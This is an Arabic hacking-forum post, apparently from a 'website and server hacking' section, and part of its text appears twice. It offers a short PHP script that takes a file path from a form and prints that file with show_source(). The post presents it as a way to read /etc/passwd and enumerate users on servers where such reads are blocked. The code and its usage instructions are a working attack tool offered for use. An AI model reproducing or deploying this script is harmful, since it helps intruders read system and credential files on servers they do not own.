ViRuS_BaGhDaD
New Member
Bypass Read /etc/passwd Via show_source Function
الـسـلام عـلـيـكـم ورحـمـة الله وبـركـاتــه
مثل ما موضح بعنوان الموضوع
Bypass Read /etc/passwd By show_source Function
تخطي قرائه ملف /etc/passwd عن طريق داله الـ ()show_source
كتبت لكم كود بسيط جدا وبنفس الوقت احيانا يفيد في تخطي منع قرائه اليوزرات
ديناميكيه الكود تعتمد على استغلال احدى ثغرات السيرفر وهالداله نادرا ما يتم منعها في السيرفر
يعني ان شاء الله راح تضبط معاكم بنسبه 70%
والكود كمان بسيط جدا
ما يحتاج شرح
فقط ضع الملف الي تريد تقرا في المربع واضغط على Get !
وطبعا الملف راح يكون
/etc/passwd
اي استفسار جاهز
المــصــدر
http://www.sec-art.net/forum/231/
تحياتي للجميع.
مثل ما موضح بعنوان الموضوع
Bypass Read /etc/passwd By show_source Function
تخطي قرائه ملف /etc/passwd عن طريق داله الـ ()show_source
كتبت لكم كود بسيط جدا وبنفس الوقت احيانا يفيد في تخطي منع قرائه اليوزرات
ديناميكيه الكود تعتمد على استغلال احدى ثغرات السيرفر وهالداله نادرا ما يتم منعها في السيرفر
يعني ان شاء الله راح تضبط معاكم بنسبه 70%
والكود كمان بسيط جدا
PHP:
<title>Read /etc/passwd</title>
<font face="Times New Roman" size="6">BY Cyb3r-R00T</font><br />
<form method="POST" action="">
<p>
<input type="text" name="passwd" size="20">
<input type="submit" value="Get" name="B1">
</p>
</form>
<?
$sec = $_POST['passwd'];
if ($sec){
show_source ("$sec");
}
?>ما يحتاج شرح
فقط ضع الملف الي تريد تقرا في المربع واضغط على Get !
وطبعا الملف راح يكون
/etc/passwd
اي استفسار جاهز
المــصــدر
http://www.sec-art.net/forum/231/
تحياتي للجميع.
اسم الموضوع : Bypass Read /etc/passwd Via show_source Function
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات